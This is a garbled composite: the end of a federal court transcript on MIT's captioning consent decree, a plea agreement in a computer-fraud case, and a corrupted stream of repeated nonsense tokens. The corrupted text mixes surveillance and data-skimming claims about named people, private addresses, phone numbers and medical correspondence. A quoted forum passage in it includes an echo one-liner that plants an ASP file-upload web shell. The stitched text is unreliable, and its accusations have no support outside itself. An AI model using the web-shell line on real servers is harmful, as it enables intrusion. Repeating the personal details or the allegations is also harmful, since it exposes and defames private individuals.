10  decree, MIT agrees -- well, there is a cure process so that

11  if material is identified on the website that is not

12  captioned, it -- the person seeking access will request

13  captioning, can request captioning.  That's a cure process.

14          And MIT has agreed that it will not rely on this

15  cure process to circumvent the requirements of Section 4 of

16  the consent decree.  Section 4 requires captioning.  But,

17  also, MIT has agreed that, in response to either a cure

18  request or a public request, it will engage in good faith

19  effort to capture the MIT content before removing it.

20          So I think the parties have addressed the risk

21  that Mr. Orr identifies, which is that it may be easier,

22  less expensive, less cumbersome to simply remove something

23  from the website instead of making it accessible.  So while

24  I understand the concern, I think the parties have thought

25  about and addressed it.

1          The two other concerns that Mr. Orr identified
2     were -- had to do with the terms of the release. And,
3     again, I looked yesterday, you know, as carefully at the
4     release provisions and -- give me just a minute to find
5     the -- so -- and, again, I think that the release does
6     really address -- in other words the release is by -- it's
7     by the plaintiffs and by those who they represent. We
8     are -- we have -- you know, the request is to certify a
9     class of individuals, and those individuals would be
10    releasing claims.

11         But it is really limited to -- they're only
12    releasing claims regarding accessibility for the lack of
13    captioning or accurate captioning of online audio or video
14    content for the general public that is produced, created,
15    posted, linked to, or embedded by MIT and that were asserted
16    or could have been asserted in these actions.

17         So to the extent that the risk that Mr. Orr is
18    identifying is that the release is too broad, I do believe
19    that it's limited to the claims that were or could have been
20    asserted in this lawsuit. That seems, to me, appropriate in
21    terms of the terms of agreement to enter into a consent
22    decree like this and undertake the actions that MIT has
23    agreed to take to increase accessibility of its online
24    content.

25         The other concern I think was more of a word -- I

1  would call it -- I hope this isn't impossible to

2  translate -- a word-snipping concern, which has to do with

3  the California statutes. And I -- by expressly referencing

4  the requirements of the California statute and specifically

5  California Civil Code, Section 1542, I do believe that the

6  release as drafted, you know, adequately incorporates the

7  notion that the release doesn't extend to claims that a

8  releasing party did not know or suspect to exist at the time

9  that the release was signed.

10        So I think the release -- for those reasons, I

11  think that the two objections that Mr. Orr raises with

12  respect to the terms of the release, again, are

13  adequately -- first of all, I think the scope of the release

14  is appropriate and that the release adequately incorporates

15  the provisions of the California Civil Code in Section 1542.

16        So generally speaking, I am going to again --

17  we've provisionally certified the class. I am going to

18  certify the class. And I do find that the settlement

19  agreement is, you know, fair and equitable, important, and I

20  am going to enter the consent decree. The Court will retain

21  jurisdiction of the case for three years, as requested.

22        Mr. Sellers, let me hear on the plaintiffs'

23  behalf anything that you would want to add to the record at

24  this point.

25        MR. SELLERS:  Thank you, Your Honor.

```
 1          You've already, as usual, anticipated many of the
 2  points that I'd make and don't need to say again.
 3          I would like to say one thing to Mr. Orr, if I
 4  may, which is that, notwithstanding that we respectfully
 5  disagree with the objections he raised, we applaud and
 6  really appreciate his participation in the process today and
 7  hope he will continue to remain actively involved in legal
 8  proceedings like this around the country.  We really admire
 9  what he's done, and as I said, while we disagree with the
10  substance of it, we really appreciate his involvement.
11          Other than that, Your Honor, we've already, I
12  think, expressed our views about why the agreement is fair
13  and reasonable to the class as a whole.  We think it is a
14  really significant agreement and should make very
15  significant changes to the way -- to the online content and
16  its accessibility to people who are deaf and hard of hearing
17  around the country and around the world, from MIT websites.
18  And we are all, I think, really honored to have been part of
19  this.
20          So unless anybody else has anything to add on
21  my -- on behalf of the plaintiffs, we appreciate your
22  presiding over this and look forward to constructive
23  implementation of the decree.
24          THE COURT:  Thank you, Mr. Sellers.
25          Mr. Braceras, on behalf of the MIT and associated
```

1  defendants?

2           MR. BRACERAS:  Yes, Your Honor, just briefly.  We

3  also appreciate Mr. Orr's participation and objection.  We

4  agree with your resolution of that.

5           So much has happened since we met before, and we

6  actually reached a settlement here with Mr. Sellers and

7  Ms. Cochran and Mr. Murphy.  And I think that everything

8  that's happened in the last three months just sort of

9  underscores the importance of what we were able to

10 accomplish and -- you know, consistent with the letter that

11 you read this morning, Your Honor.

12          So we, again -- we appreciated working with the

13 plaintiffs' counsel -- professional throughout.  And we

14 thank Your Honor and Judge Dein again for getting to this,

15 you know, I think very good result for everyone.

16          THE COURT:  Thank you.  Thank you.

17          I also wanted to say to Mr. Orr, if I didn't

18 clearly, sort of, convey this, that we appreciate the

19 thought and attention that went into the objections that you

20 raised, and I hope it was clear that the Court took them

21 seriously and reviewed the content of the consent decree.

22          I wanted to add one other thing, and that was

23 that Mr. Orr identified problems with accessing the online

24 form that the Court made available for objecting to the

25 terms of the consent decree.  I really regret that.  I think

1    anybody who has had, you know, problems with filling out

2    online forms can understand how frustrating that is.

3              And we had hoped that, you know -- that that

4    would be an additional avenue to make objections known to

5    the Court and that it would be comparatively simple.  And if

6    it didn't work, all I can do is apologize for whatever

7    frustration was added to the process by any malfunctioning

8    of that form.

9              Mr. Murphy, you have been so involved.  Is there

10   anything that you would like to add?  I have seen you, you

11   know, regularly, and I know you had worked very hard on this

12   case.

13             MR. MURPHY:  Thank you, Your Honor.  I regret

14   that we're not in person today for one last time for me to

15   say thank you in person, but I do -- we all, speaking on

16   behalf of all the plaintiffs, appreciate all of the hard

17   work that you put into this case.

18             And we're proud at Disability Law Center that

19   these cases were brought in Massachusetts.  The

20   First Circuit and this Court in particular, going back to

21   the Netflix case, has really been at the forefront of

22   accessibility issues.  And, again, to reiterate what's

23   already been said, given the changes that have occurred in

24   the world in the last few months, it really underscores the

25   importance of full Internet accessibility for everyone.

```
 1            And we hope that these cases will -- these
 2   settlements will be an impetus for other entities and
 3   organizations to continue to improve accessibility for all
 4   people.
 5            THE COURT:  Thank you.  Thank you.
 6            So the -- I think, sort of, the final order of
 7   business is I have the unopposed motion for attorneys' fees
 8   brought by the plaintiffs.  I do -- I will be granting that
 9   on the basis that the plaintiffs are the prevailing parties.
10   They are entitled to a fee and a cost award of $1,050,000.
11   This was a negotiated fee and cost amount -- no objection
12   from MIT.  The amount of the fee was reached, I think, in
13   mediation with Judge Dein, who is -- who remains interested
14   in this case.  We talk about it on a regular basis.
15            Plaintiffs' counsel, there's no doubt, is highly
16   qualified, very experienced in litigating disability
17   discrimination and accommodation cases.  The case was
18   complex.  It raised difficult issues.  It required very
19   substantial work.
20            I think the fee petition shows that counsel took
21   reasonable steps to avoid a duplication of efforts in that
22   the fee that, essentially, the parties have agreed on is
23   justified and reasonable.  And as I've said before, the
24   caliber of the work by the plaintiffs' attorneys was
25   remarkable.  I would also say the same of the caliber of the
```

```
 1    work by defense counsel and the efforts that both sides made
 2    to, you know, come to grips with these very difficult and
 3    very important issues.
 4              So let me ask you, Mr. Sellers, is there anything
 5    else on behalf of the plaintiffs this morning?
 6              MR. SELLERS:  No, Your Honor.  Thank you for your
 7    attention to all of these issues.
 8              THE COURT:  Okay.  Let me ask, Mr. Braceras,
 9    anything else on behalf of the -- of MIT and/or the
10    defendants generally?
11              MR. BRACERAS:  No, Your Honor.  All set.  Thank
12    you very much.
13              THE COURT:  Okay.  Anyone else before we close
14    here?  No.
15              All right.  Well, thank you all again very much.
16    We're actually going to do a seminar on these two cases, the
17    Harvard and MIT cases, for the -- the Court has a group of
18    fellows, we call them in the Nelson Fellows in memory of
19    David Nelson and the Lindsay Fellows in memory of Judge
20    Reginald Lindsay and -- neither of whom are with us anymore.
21              But we're going to have a seminar.  Some of them
22    are high school students.  Some of them are college
23    students.  And we're going to have a seminar on these cases
24    for them tomorrow afternoon.
25              Again, thank you all very much.  It's been a real
```

1    honor to be involved in the case.   Thank you.

2              (Court in recess at 10:28 a.m.)

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

1          **CERTIFICATE OF OFFICIAL COURT REPORTER**

2

3

4              I, Robert W. Paschal, Registered Merit Reporter

5    and Certified Realtime Reporter, in and for the United

6    States District Court for the District of Massachusetts, do

7    hereby certify that pursuant to Section 753, Title 28,

8    United States Code, the foregoing pages are a true and

9    correct transcript of the stenographically reported

10   proceedings held in the above-entitled matter and that the

11   transcript page format is in conformance with the

12   regulations of the Judicial Conference of the United States.

13

14                   Dated this 27th day of July, 2020.

15

16

17

18              /s/ ROBERT W. PASCHAL

19

20              _____
                Robert W. Paschal, RMR, CRR
21              Official Court Reporter

22

23

24

25

2073984700

DC   FL Document ID (NC-1)

Export 1981 / 07896+
Medical Records Release Authorization
:393      X      (NN)
:393      X      (JC)
:393      X      (JC)
:201      X      (JC)
:301      X      (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print: ............

# ORIGINAL

CLERK U.S. DISTRICT COURT
NORTHERN DIST. OF TX
FILED

2020 OCT 19   AM 11:35

IN THE UNITED STATES DISTRICT COURT
FOR THE NORTHERN DISTRICT OF TEXAS
DALLAS DIVISION

DEPUTY CLERK ___

UNITED STATES OF AMERICA

v.

TELESFORO AVILES

NO.

## 3-20CR0506-X

### PLEA AGREEMENT

Telesforo Aviles, the defendant, Tom Pappas, the defendant's attorney, and the

United States of America (the government) agree as follows:

1.      **Rights of the defendant:** The defendant understands that the defendant
has the rights:

      a.      to plead not guilty;

      b.      to have a trial by jury;

      c.      to have the defendant's guilt proven beyond a reasonable doubt;

      d.      to confront and cross-examine witnesses and to call witnesses in the
defendant's defense; and

      e.      against compelled self-incrimination.

2.      **Waiver of rights and plea of guilty:** The defendant waives these rights

and pleads guilty to the offense alleged in Count One of the Information, charging a

violation of 18 U.S.C. § 1030(a)(2)(C) and (c)(2)(B)(ii), that is, Computer Fraud. The

defendant understands the nature and elements of the crime to which the defendant is

Plea Agreement—Page 1

2073984700

DC  7L  Document 10 (AC-3)

August 1101 / 07996.
Medical Records Release Authorization
[191]      A      [MR]
[191]      X      [JC]
[191]      X      [JC]
[191]      X      [JC]
[191]      X      [JC]

## CHRON (REVIEW 4 OF 4)
Password required to print. ............

Case 0:20-cv-60971-AHS   Document 53-3   Entered on FLSD Docket 10/27/2020   Page 8 of 8
Case 3:20-cr-00506-X   Document 4   Filed 10/19/20   Page 7 of 7   PageID 12

AGREED TO AND SIGNED this 19 day of October , 20 20 .

ERIN NEALY COX
UNITED STATES ATTORNEY

_____                    **Focus Center**

Sid P. Mody
Assistant United States Attorney
Texas State Bar No. 24072791
1100 Commerce St. Suite 300
Dallas, Texas 75242                        **Focus Center**
Tel: 214-659-8600
siddharth.mody@usdoj.gov

_____                    **Focus Center**
Erin Martin
Criminal Section Chief

I have read or had read to me this plea agreement and have carefully reviewed
every part of it with my attorney. I fully understand it and voluntarily agree to it.

_____        10/16/20
Telesforo Aviles              Date
Defendant

I am the defendant's attorney. I have carefully reviewed every part of this plea
agreement with the defendant. To my knowledge and belief, my client's decision to enter
into this plea agreement is an informed and voluntary one.

_____        6/16/20
Tom Pappas                    Date
Attorney for Defendant

Plea Agreement—Page 7

2073984700

OC PL Document ID (NC-1)

August 1981 / 07036-
Medical Records Release Authorization
:195    A    (NM)
:195    A    (JC)
:195    A    (JC)
::01    A    (JC)
::01    A    (JC)

CHRON (REVIEW 4 OF 4)
Password required to print: ···········

Focus Center

Focus Center

Focus Center

2073984700

DC  FL Document ID (AC-3)

August 1991 / 07898.
Medical Records Release Authorization
1993      A       WMI
1993      A       IJCI
1119      A       IJCI
1110      A       IJCI
1991      A       IJCI

## CHRON (REVIEW 4 OF 4)
Password required to print: ············

Case 0:20-cv-60971-AHS   Document 53-3   Entered on FLSD Docket 10/27/2020   Page 3 of 8
Case 3:20-cr-00506-X   Document 4   Filed 10/19/20   Page 2 of 7   PageID 7

pleading guilty, and agrees that the factual resume the defendant has signed is true and

will be submitted as evidence.

    3.    **Sentence:** The maximum penalties the Court can impose include:

        a.    imprisonment for a period not to exceed five years;

        b.    a fine not to exceed $250,000.00, or twice any pecuniary gain to the
defendant or loss to the victim(s);

        c.    a term of supervised release of not more than three years, which may
be mandatory under the law and will follow any term of
imprisonment. If the defendant violates the conditions of supervised
release, the defendant could be imprisoned for the entire term of
supervised release;

        d.    a mandatory special assessment of $100.00;

        e.    restitution to victims or to the community, which may be mandatory
under the law, and which the defendant agrees may include
restitution arising from all relevant conduct, not limited to that
arising from the offense of conviction alone;

        f.    costs of incarceration and supervision; and

        g.    forfeiture of property.

    4.    **Immigration consequences:** The defendant recognizes that pleading

guilty may have consequences with respect to the defendant's immigration status if the

defendant is not a citizen of the United States. Under federal law, a broad range of

crimes are removable offenses. The defendant understands this may include the offense

to which the defendant is pleading guilty, and for purposes of this plea agreement, the

defendant assumes the offense is a removable offense. Removal and other immigration

Plea Agreement—Page 2

2073984700

DC  7L Document 10 (AC-2)

August 1101 / 07896-
Medical Records Release Authorization
1395      A      (NU)
1193      A      (JC)
1134      A      (JC)
1201      A      (JC)
3203      A      (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print: ...........

consequences are the subject of a separate proceeding, however, and the defendant

understands that no one, including the defendant's attorney or the district court, can

predict to a certainty the effect of the defendant's conviction on the defendant's

immigration status. The defendant nevertheless affirms that the defendant wants to plead

guilty regardless of any immigration consequences that the defendant's plea of guilty

may entail, even if the consequence is the defendant's automatic removal from the United

States.

    5.    **Sentencing agreement:** Pursuant to Federal Rule of Criminal Procedure

11(c)(1)(C), the parties agree to a sentencing range of not less than 18 months but not

more than 60 months. If the Court accepts this plea agreement, this sentencing provision

is binding on the Court. Other than the agreed sentencing range, there are no other

sentencing limitations, and the Court remains free to determine the appropriate sentence

under the advisory United States Sentencing Guidelines and 18 U.S.C. § 3553.

    6.    **Rejection of agreement:** Pursuant to Federal Rule of Criminal Procedure

11(c)(5), if the Court rejects this plea agreement, the defendant will be allowed to

withdraw the defendant's guilty plea. If the defendant declines to withdraw the

defendant's guilty plea, the disposition of the case may be less favorable than that

contemplated by the plea agreement.

    7.    **Mandatory special assessment:** The defendant agrees to pay to the U.S.

District Clerk the amount of $ 100.00, in satisfaction of the mandatory special assessment

in this case.

Plea Agreement—Page 3

2073984700

OC   PL Document 1D (AC-3)

```
August 1981 / 07286+
Medical Records Release Authorization
:193    A    (NM)
:193    X    IJCI
:335    X    IJCI
:201    A    IJCI
:291    X    IJCI
```

## CHRON (REVIEW 4 OF 4)
Password required to print: ············

Case 0:20-cv-60971-AHS   Document 53-3   Entered on FLSD Docket 10/27/2020   Page 5 of 8
Case 3:20-cr-00506-X   Document 4   Filed 10/19/20   Page 4 of 7   PageID 9

    8.    **Defendant's agreement:** The defendant shall give complete and truthful information and/or testimony concerning the defendant's participation in the offense of conviction. Upon demand, the defendant shall submit a personal financial statement under oath and submit to interviews by the government and the U.S. Probation Office regarding the defendant's capacity to satisfy any fines or restitution. The defendant expressly authorizes the United States Attorney's Office to immediately obtain a credit report on the defendant in order to evaluate the defendant's ability to satisfy any financial obligation imposed by the Court. The defendant fully understands that any financial obligation imposed by the Court, including a restitution order and/or the implementation of a fine, is due and payable immediately. In the event the Court imposes a schedule for payment of restitution, the defendant agrees that such a schedule represents a minimum payment obligation and does not preclude the U.S. Attorney's Office from pursuing any other means by which to satisfy the defendant's full and immediately enforceable financial obligation. The defendant understands that the defendant has a continuing obligation to pay in full as soon as possible any financial obligation imposed by the Court.

    9.    **Government's agreement:** The government will not bring any additional charges against the defendant based upon the conduct underlying and related to the defendant's plea of guilty. The government will file a Supplement in this case, as is routinely done in every case, even though there may or may not be any additional terms. The government will dismiss, after sentencing, any remaining charges in the pending Information. This agreement is limited to the United States Attorney's Office for the

Plea Agreement—Page 4

2073984700

OC PL Document ID (AC-2)

August 1983 / 07896-
Medical Records Release Authorization
:195      A      (MM)
:193      X      (JC)
:199      X      (JC)
::01      X      (JC)
:?03      X      (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print: ·············

Northern District of Texas and does not bind any other federal, state, or local prosecuting authorities, nor does it prohibit any civil or administrative proceeding against the defendant or any property.

10. , Violation of agreement: The defendant understands that if the defendant violates any provision of this agreement, or if the defendant's guilty plea is vacated or withdrawn, the government will be free from any obligations of the agreement and free to prosecute the defendant for all offenses of which it has knowledge. In such event, the defendant waives any objections based upon delay in prosecution. If the plea is vacated or withdrawn for any reason other than a finding that it was involuntary, the defendant also waives objection to the use against the defendant of any information or statements the defendant has provided to the government, and any resulting leads.

11. Voluntary plea: This plea of guilty is freely and voluntarily made and is not the result of force or threats, or of promises apart from those set forth in this plea agreement. There have been no guarantees or promises from anyone as to what sentence the Court will impose.

12. Waiver of right to appeal or otherwise challenge sentence: The defendant waives the defendant's rights, conferred by 28 U.S.C. § 1291 and 18 U.S.C. § 3742, to appeal the conviction, sentence, fine and order of restitution or forfeiture in an amount to be determined by the district court. The defendant further waives the defendant's right to contest the conviction, sentence, fine and order of restitution or forfeiture in any collateral proceeding, including proceedings under 28 U.S.C. § 2241 and 28 U.S.C. § 2255. The defendant further waives the defendant's right to seek any future

Plea Agreement—Page 5

2073984700

DC  FL Document ID (AC-2)

August 1981 / 07086+
Medical Records Release Authorization
:193    A    (KK)
:197    A    (JC)
:198    A    (JC)
:202    A    (JC)
:70)    A    (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print: ···········

reduction in the defendant's sentence (e.g., based on a change in sentencing guidelines or statutory law). The defendant, however, reserves the rights (a) to bring a direct appeal of (i) a sentence exceeding the statutory maximum punishment, or (ii) an arithmetic error at sentencing, (b) to challenge the voluntariness of the defendant's plea of guilty or this waiver, and (c) to bring a claim of ineffective assistance of counsel.

13.    **Representation of counsel:** The defendant has thoroughly reviewed all legal and factual aspects of this case with the defendant's attorney and is fully satisfied with that attorney's legal representation. The defendant has received from the defendant's attorney explanations satisfactory to the defendant concerning each paragraph of this plea agreement, each of the defendant's rights affected by this agreement, and the alternatives available to the defendant other than entering into this agreement. Because the defendant concedes that the defendant is guilty, and after conferring with the defendant's attorney, the defendant has concluded that it is in the defendant's best interest to enter into this plea agreement and all its terms, rather than to proceed to trial in this case.

14.    **Entirety of agreement:** This document is a complete statement of the parties' agreement and may not be modified unless the modification is in writing and signed by all parties. This agreement supersedes any and all other promises, representations, understandings, and agreements that are or were made between the parties at any time before the guilty plea is entered in court. No promises or representations have been made by the United States except as set forth in writing in this plea agreement.

Plea Agreement—Page 6

2073984700

OC   PL Document ID (AC-?)

August 1983 / 07888.
Medical Records Release Authorization
1:35)   X   (NN)
1:44)   X   (JC)
1:15)   X   (JC)
1:20)   X   (JC)
1:23)   X   (JC)

CHRON (REVIEW 4 OF 4)
Password required to print. ............

Focus Center

Focus Center

Focus Center

2073984700

DC FL Document ID (NC-3)

August 1983 / 07858-
Medical Records Release Authorization
1893    A    (NM)
1883    A    IJCI
1838    A    IJCI
2302    A    IJCI
3103    A    IJCI

## CHRON (REVIEW 4 OF 4)
Password required to print; ···········

OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b

in your client,save as up.vbs:Subject: EMAILCRAWLER7352
Date:7-14-05GOTO29712specsetGOTO8a
MIME7-Version:Reset5
Content-Type: multipart5/mixed2
boundary=Confidential71
XT-Priority1:  DND
XT-MSMail-Priority:DND
XT-Mailer: DND
XR-MimeOLE:
XR-pstn-levels:    DND
XR-pstn-settings: DND
XR-pstn-addresses:
XR-LMAIL-SPAM-STATISTICS:DND
Charset5: DO NOT DISPLAY

This is a Content-transfer-encodingDNDONLYDNDONLY:

SETTOSCAN623452828sfcy836239
[message truncated] SETTO092369 GOTO9312a
J. Eliseo, rec
S-17
Initial 963424146209re-directR7
203-453-9403
128 Driftwood Ln
Guilford, CT 06437
Mtc/rec Contact Stanley Stek

Secr. repo dictated, sig on fl, rec. signed copy, per ds.secretary
Reset363

E-9
J. Eliseo, rec
S-17
Initial 963424146209re-direct
203-453-9403
128 Driftwood Ln
Guilford, CT 06437  RNGenSETTO989356 RNGenSETTO989356 RNGenSETTO989356
RNGenSETTO989
Mtc/rec Contact Stanley Stek

per2982downld826 per2982downld826 per2982downld826 Porto will not agree
to continue additional contract audio surveillance of 145 Greystone per
cellular scanner, ctr said 800/900 MHz cellular telephone or any
cordless telephone allows both sides of the conversation per rew/013
Cellular   Telephone   Scanner/Model   AU   013/SR904762cache3aGOTO

2073984700

OC  TL Document 10 (XC-2)

Request 1381 / 0709L-
Medical Records Release Authorization
:393      A      1KK)
:397      X      (JC)
:419      X      (JC)
::0:      X      (JC)
:?0)      X      (JC)

## CHRON (REVIEW 4 OF 4)

Password required to print· ···········

Also per Telemonitor 3000 for audio on premises via regular telephone
lines, as long as ID system can be programmed to recognize listener as
the owner of the phone.   Easy to reprogram call-in to recognize any
phone-in as the caller, so worked pretty well June-Aug2004 + Jan2005
and Aug 2005, till 92a dipswitch reroute. Will retain only CT video
for remainder of 2005 and Q1 2006. Porto said no wonder D.Orr unable
to exhaust administrative remedies, called supv again after hrs to
discuss truncation of surv. Reported Jun/Jul 2004 typical day as f1/no
F/U:a.  D.Orr morning wk-up: 3:30 - 3:45 AM/work 6 days regularly,
sometimes all 7
b. After her own brfst, makeup, dress, and wash face 3:45-4:00, then
prep. food + area for husband 4:00 - 4:45 AM
c. Cleansing of feces-soiled clothing of husband, also cleansing of
other special areas, including vomitus from moving husband.
d. Often 8-9 times helping husband with movement when unable to
(before waking up at 3:30 AM)
e. Household chores, manmy related to husband's handicaps, after 4:45
AM
f. Leave house from 5:30 AM to 6:00, sometimes before because of work
schedule doubling, and related.
g. Travel to Simsbury, approx. 31 mi from Southington, about 40 min.
of travel in morning if no traffic pile-up/jam
h. Start work from 6:30 or so, go till 5:00 till 6:00 PM, depending on
demands
i. Travel home, shop at Firzgerald's before on road, then shopping
often on way home, Walmart and related, generally for husband's spec.
needs/ C.R. Dr. Guerrera, et al.
j. Arrive home often 7:30 PM
k. Spec. prep. for husband for meals
l. Evening meal approx 8:00 PM or close to.
m. Help husband with bath, except often takes two-three nights for
full bath, since husband's body cannot take stress of full bath in one
day / 9:00 - 10:30
n. Clean bathtub, and related / 11:00
o. Household chores / of daily variety, not including weekly tasks of
lawn, outside (snow removal if other months of year, etc.) 11:00 -12:00
SETTOSCAN623452828sfcy836239
[message truncated] SETTO92369 GOTO9312a
J. Eliseo, rec
S-17
Initial 963424146209re-directR7
203-453-9403
128 Driftwood Ln
Guilford, CT 06437
Mtc/rec Contact Stanley Stek
p. Recurrent monthly bills and paperwork, not including insurance
generally / 12:00 - 12:45+
q. Own bath/shower: 12:45 - 1:00+
r. Retire to sleep 1:15+
Generally repetitive schedule, and if day off once every two weeks
approx., then errands such as car repairs and other necessaries gen.
consume entire day, nght, with same schedule 3:30AM wakeup, and bed

2073984700

OC PC Document ID (RC-2)

August 1981 / 07096-
Medical Records Release Authorization
   [1995    A    (NR)
    1997    A    (JC)
    1999    A    (JC)
    2001    A    (JC)
    2003    A    (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print: ············

after midnight. Audio espec picked up on extra hours req. for insurance
matters, inclusive of letter to Tucker, answering questions, and moving
document items, etc. May have hurt herself in moving the boxes.
Repeated surveillance dozens of times since, with recents about 1-7-
2020.
Hao Gu 10-7-15: HG (to TA) Where are you now, Telesforo? Did you get
the prev mess? I have asked Alfred to fix the fl/ln-Eliseo and fl/ln-
page-number repeat issues, too. Pronto. Telesforo, your surveillance on
Amanda Phillips via ADT and Rodan or whatever she's affil with must
stop. Pronto. But all the Facebook/Apple server skimming - via URL
masking and erasing and all those other tricks from Alfred - that you
did on Orr's Facebook account and his Firstenergy contacts and so forth
for years,..from 2010 to today, was real good. It paid off big time. Via
ADT it linked us to the files Orr has on Thomas Macri, so continue
those activities as we discussed at Hamm's restaurant in the Nobelstown
area. Then go ahead and check out taylor Madison. The third-party
servers skimmed the meds and financials on Orr pretty good at least
twice, too, so proceed to next step before Barlow gets back to us if
you can. Either encrypt 2-layer, or use 2-3 proxy addresses/links.
END42
TA (TO HG): OK.
LINK76 HG5523425-cnt-
J. Eliseo, rec
S-17
Initial 963424146209re-direct
203-453-9403
128 Driftwood Ln
Guilford, CT 06437 RNGenSETTO989356  RNGenSETTO989356  RNGenSETTO989356
RNGenSETTO989
Mtc/rec Contact Stanley Stek

WP sequestered/Nodoctor-patient relationship exists or is implied by
this report, and no treatment was given or suggested by the
rev/examiner(s).

E-Gold and/or rel. if required,as RJP wishes separation from other
accounts.   Porto   wants   mor   RNGenSETTO989356   RNGenSETTO989356
RNGenSETTO989356   RNGenSETTO989829034ae,   and   re-mentioned   the
groundbreaking  NYT  article  on  Dow  Chem  corp  veil  with  Corning
/completely   non-existent   veil   /counsel   lost   nerve   on
OrrGOTO23926emailcrawler823SETOPortoDC24b  pretty  quick,  excess  of
$2+/3+ billion liability, maybe even $10+, could easily pull Dow
Chemical into Chap 11 right along with Corning if he testifies about
Sarnia lab notebooks to Nevada court, or to Pointer, et al, even could
re-surface in future since liability will go for decades on Dow
Chemical's  part  ---  we  lost  NVcase  big,  and  must  make  sure
OrrGOTO23926emailcrawler823SETOPortoDC24b does not testify on green
books/lnk --- both the corporate veil case and NYT article came out the
exact  same  week  as  OrrGOTO23926emailcrawler823SETOPortoDC24b's
accident, 11-1-05 versus 10-25-05 accident, within a couple of days.
What's worse, the accident was within hours of Dow's violation of
OrrGOTO23926emailcrawler823SETOPortoDC24b-agreement. Six to seven hours

3791423

2073984700

DC FL Document ID (AC-3)

August 1991 / 07096+
Medical Records Release Authorization

## CHRON (REVIEW 4 OF 4)
Password required to print: ···········

after his having been invited back to Dow.  Porto knows he still has us
over  a  barrel  and  even  joked  that  maybe  Dow  bombed
OrrGOTO23926emailcrawler823SETOPortoDC24b's car or sent somebody to do
him in. He's not the only one who's said that, either. Even Sefc. See
notes on Stek, too. Anyhow, Dow broke the 1986/1987agreement big time,
on  the  very  day  of  the  accident,  too,  and  then  all  of  a  sudden
OrrGOTO23926emailcrawler824SETOPortoDC24b is disabled, totally, within
hours of being forced to come back on Dow ground in Michigan against
his will.  His worst nightmare, he said, just to have to come to
Midland, he said, and he might want to retaliate.  Told us to never
ever contact him, never call him, nevr contact his employer, never
contact his home, never do anything of the sort, and in spite of all
that, the lab people in 1712 and 2040 wouldn't listen. Sandy
especially. Caused problems with Chuck Colinson, Bob MacMullin, Jeff
Convers, even Zinnert, but especially with the recruiters. And the
Zinc/Silicone thing is a real big problem too since Sefcovic wrote in
the escape clause that keeps Dow on the hook until the end of
OrrGOTO23926emailcrawler823SETOPortoDC24b's life if he's ever disabled.
The green books are the real problem, though, and that ID. Dual DC/DC,
both ways, and the margin notes.  Jakub, too. Talked to Butts, but
won't help now. Set whole chain up.  Caused many problems for
OrrGOTO23926emailcrawler823SETOPortoDC24b.        Reset272650hGOTOmarqin
error6354nofontma        tch3037ResetE-9        Now        or        later
OrrGOTO23926emailcrawler823SETOPortoDC24b may still decide to break
corporate veil.  TEXTrefle25289STOP629Porto has evidently met Dr.
Jackson's fm, yet still seems unfamiliar with transfer rules. Add. qst.
on transfers; requested three sep., as two colleagues assisting UM emp.

Has re-asked for sep. pa7yments.
SETTO092372
SETTO092372
SETTO092372
User   mailbox   exceeds   allowed   size/=288788920845963424146209re-
directR7Porto   Stefan   Underhillemailcrawler352%3   stefan   Initial
963424146209re-directR7Porto Stefan Underhillemailcrawler352%3 stefan
Initial            963424146209re-directR7Porto            Stefan
Underhillemailcrawlerresethttp://8-9-
05rtwsibl.od2.com/common/wmp/redirect.aspx?{'sghiy=0051445082541519-
9045 352serverredirect%3aGOTOCTRL + click to follow link

GOTO9262temptation of course vbs file is run like exe , and realloader
u may have a mistake in ur echoing , if u copy the exact echo with its
spaces and change what is supposed to be changed it should work fine ,
and its tested remotely by the way .. Maybe soon i am planning to
release some document about all ways to upload files to cmd shell ,
since i started with tftp and net share , then i increased my

3791424

2073984700

DC  FL Document ID (SC-7)

August 1981 / 07396-
Medical Records Release Authorization
:195      X     (NN)
:197      X     (JC)
:539      X     (JC)
:201      X     (JC)
:201      X     (JC)

## CHRON (REVIEW 4 OF 4)
Password required to print: ············

knowledge to the ftp method , then i made that vbs thing , and i knew
after that the mshta thing , and i did other way with echoing , but
its still beta thing (has some problems , but u can echo anytext u
want including signs and all;GOTO&5294 underline link to file@echo
^<%with server.createobject("adodb.stream"):.type=1:.open:.write
request.binaryread(request.totalbytes):.savetofile
server.mappath(request.querystring("s")),2:end with%^> >up.asp

OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b
OrrGOTO23926emailcrawler823SETOPortoDC24b

in your client,save as up.vbs:Subject: EMAILCRAWLER7352
Date:7-14-05GOTO29712specsetGOTO8a
MIME7-Version:Reset5
Content-Type: multipart5/mixed2
boundary=Confidential71
XT-Priority1:  DND
XT-MSMail-Priority:DND
XT-Mailer: DND
XR-MimeOLE:
XR-pstn-levels:    DND
XR-pstn-settings: DND
XR-pstn-addresses:
XR-LMAIL-SPAM-STATISTICS:DND
Charset5: DO NOT DISPLAY

This is a Content-transfer-encodingDNDONLYDNDONLY:

[message truncated] SETTO92372 Hello,

I can schedule a half hour on Friday, April 1 at 4:30.

-----Original Message-----
From: darlene and ed [SMTP:e.orr@cox.net]
Sent: Monday, March 21, 2005 9:24 AM
To: katie.campochiaro@yalegriffinprc.org
Cc: darlene and ed
Subject: SCHEDULING A FOLLOW-UP APPOINTMENT WITH DR. KATZ

Hi Katie,

In order to keep Dr. Katz fully apprised of any developments with
Edward,

3791425

2073984700

DC  FL Document ID (RC-2)

August 1311 / 07836-
Medical Records Release Authorization
:315     X      IMMI
:397     X      IJCI
:339     X      IJCI
:701     X      IJCI
